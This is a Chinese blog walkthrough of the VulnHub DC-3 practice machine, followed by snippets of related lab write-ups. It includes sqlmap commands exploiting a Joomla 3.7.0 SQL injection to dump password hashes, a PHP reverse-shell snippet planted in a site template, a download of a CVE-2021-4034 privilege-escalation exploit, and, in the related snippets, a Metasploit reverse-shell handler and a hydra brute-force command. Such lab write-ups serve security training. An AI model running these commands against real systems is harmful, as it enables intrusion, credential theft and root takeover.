靶机DC-3

最新推荐文章于 2025-12-03 11:14:46 发布
原创 最新推荐文章于 2025-12-03 11:14:46 发布 · 450 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #计算机网络 #linux

搭建可能出现的情况:

第一次导入镜像失败,可以再次尝试

若出现报错的情况,都能搜到攻略,在设置里边更改IDE0:0即可

以上情况博主都遇到了,不过都能搜到攻略

信息收集

arp-scan -l

我这里NET 模式,所以192.168.56.143是我们的靶机IP

nmap -p- -sV -O -sC 192.168.56.143

只有80http,访问是登陆框,而且当前用户home?,没有权限

扫描目录看是否有价值的东西,找到后台地址

漏洞发现

尝试弱密码未果,看到网站的CMC,使用框架的扫描工具——joomscan,知道版本是Joomla 3.7.0

使用searchsploit (kali自带的漏洞库)搜索相应版本信息,发现是CVE-2017-8917历史漏洞

sql注入

可以看到payload信息,直接梭哈,得到账号密码

sqlmap -u "http://192.168.56.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

有几个数据库,查看joomladb 里边的数据

sqlmap -u "http://192.168.56.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering] --batch

users的username,和password

sqlmap -u "http://192.168.56.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns  -p list[fullordering]

查看password和username,密码是md5加密的

sqlmap -u "http://192.168.56.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password'  -p list[fullordering] --dump --batch

john解密(cmd5破击收费欧md5在线解密破解,md5解密加密)

反弹shell

admin,snoopy登录到后台,在编辑模板出可以插入shell

插入到index.php 反弹shell(php通过web调用shell,php webshell下直接反弹shell(不借助任何其他语言)-优快云博客


$sock = fsockopen("192.168.56.128","6868" );
 
$descriptorspec = array(
 
0 => $sock,
 
1 => $sock,
 
2 => $sock
 
);
 
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
 
proc_close($process);

访问/index.php

提权

GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day

这里是普通用户权限,把脚本放到靶机

本地开启http服务

wget http://192.168.56.1/CVE-2021-4034.zip

解压之后,make编译一下,运行之后,提权到root权限

VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1656
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
渗透测试靶机--- DC系列 DC-3
久恙502的博客
09-03 393
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
靶机DC-3—WP
m0_66638011的博客
05-17 2759
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC-3靶机
qq_67480384的博客
08-01 358
DC-3靶机
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 7940
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
靶机 DC-3
m0_66299232的博客
09-15 339
DC系列,joomscan,靶机,ssh登录,sqlmap,john解密,内核漏洞提权,nmap
dc-3靶机渗透
tmyzxy1314的博客
07-04 1192
dc-3靶机下载链接:启动靶机遇到的问题解决文章在下面kali最新版 dc-3靶机 两台机器都在vmware上运行 网络设置NAT模式。
DC-3靶机详细过程
2401_84706939的博客
09-30 2215
一,环境搭建我们需要一台kali,一台dc-3靶机靶机DC-3与Kali都以NAT模式连接到网络DC-3需要多修改一些东西 点击CD/DVD 在点击高级,把IDE里面的内容改成IDE 0:0 点击确定。都完成后开启KALI与DC-3二、渗透靶场查看靶场IP 输入ifconfig点击回车可以看到自己的IP。
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3795
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
CTF靶机 DC-3
weixin_52221158的博客
09-02 1022
CTF靶场 DC-3详细讲解
靶机DC-1 11111
09-25
靶机DC-1 11111作为一款特定型号的靶机,其名称中的“DC-1”很可能代表了某种特定的技术指标或者代号,而“11111”则可能指示了该靶机的序列号或是特定批次的编号。由于信息量有限,我们无法直接推断出该靶机的详细...
VulnHub靶机 DC-7 打靶 渗透详细流程
网络空间安全学习
04-22 1496
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8833
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
99-Linux上安装Anaconda
最新发布
12-03 115
【代码】99-Linux上安装Anaconda。
Linux】冯诺依曼体系结构和操作系统概述
Miun123的博客
11-29 1912
冯诺依曼体系结构是现代计算机的基础设计,由运算器、控制器、存储器、输入设备和输出设备五大部件组成,通过总线连接。操作系统采用先描述,再组织的方式进行软硬件管理,通过系统调用和库函数为用户提供安全便捷的接口。
Linux性能调优详解FIO性能测试的几个常用场景
运维老生常谈
11-29 689
fio是测试存储系统非常重要的工具,能够快速检测出磁盘的IOPS、吞吐能力,以及时间延迟。该工具能够发起指定类型的IO操作,例如顺序读写、随机读写。同时还可以发起多线性,模拟高负载场景。针对常用的IOPS、吞吐量、时延,如何有效利用fio工具,下面进行详细的讲解。
Linux 中替换某个目录下所有文件中的特定字符串
liweiweili126的博客
12-02 547
Linux 中替换某个目录下所有文件中的特定字符串,核心是用 findsed组合,支持灵活扩展(如备份原文件、过滤文件类型、排除目录等)。
Linux设备管理:从内核驱动到用户空间的完整架构解析
X
12-03 363
A[物理硬件插入/移除] --> B[内核驱动探测]B --> C{Linux统一设备模型 LDM}C --> D[在/sysfs创建对象]C --> E[发送uevent事件]D --> F[用户空间工具<br>lspci, lsusb等]E --> G[UDEV守护进程]G --> H[扫描规则库 /etc/udev/rules.d/]H --> I[匹配并执行规则]I --> J1[创建设备节点 /dev/]I --> J2[设置权限与所有权]I --> J3[执行自定义脚本]
vulnhub靶机dc-1
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值